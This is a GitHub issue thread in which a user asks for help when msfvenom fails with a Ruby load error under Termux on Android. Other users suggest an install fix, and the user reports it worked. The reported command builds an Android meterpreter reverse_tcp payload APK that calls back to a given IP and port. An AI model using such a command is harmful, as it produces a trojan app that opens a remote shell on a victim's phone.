### ISSUE TITLE
Msfvenom Error 

### ISSUE THREAD

**Issue by Teekay-X** [rapid7/metasploit-framework#16460]
## Steps to reproduce

$ msfvenom –p android/meterpreter/reverse_tcp LHOST=100.104.204.144  LPORT=8080 > android_shell.apk

## Were you following a specific guide/tutorial or reading documentation?

I was following this tutorial --> https://www.geeksforgeeks.org/how-to-install-metasploit-6-on-android-using-termux-no-root/amp/

## Expected behavior

Generate the payload apk

## Current behavior
<internal:/data/data/com.termux/files/usr/lib/ruby/3.1.0/rubygems/core_ext/kernel_require.rb>:85:in `require': cannot load such file -- metasploit/framework/profiler (LoadError)
        from <internal:/data/data/com.termux/files/usr/lib/ruby/3.1.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
        from /data/data/com.termux/files/usr/bin/msfvenom:23:in `<main>'

### Metasploit version

6.1.39-dev-a977d48

Please help it doesn't generate the payload apk .
Sorry if its a stupid issue

**Comment by dedshit** [comment]
move msfvenom to bin it will work fine

**Comment by smcintyre-r7** [comment]
Looks like a termux issue.

**Comment by Teekay-X** [comment]
Thanks it worked 👌
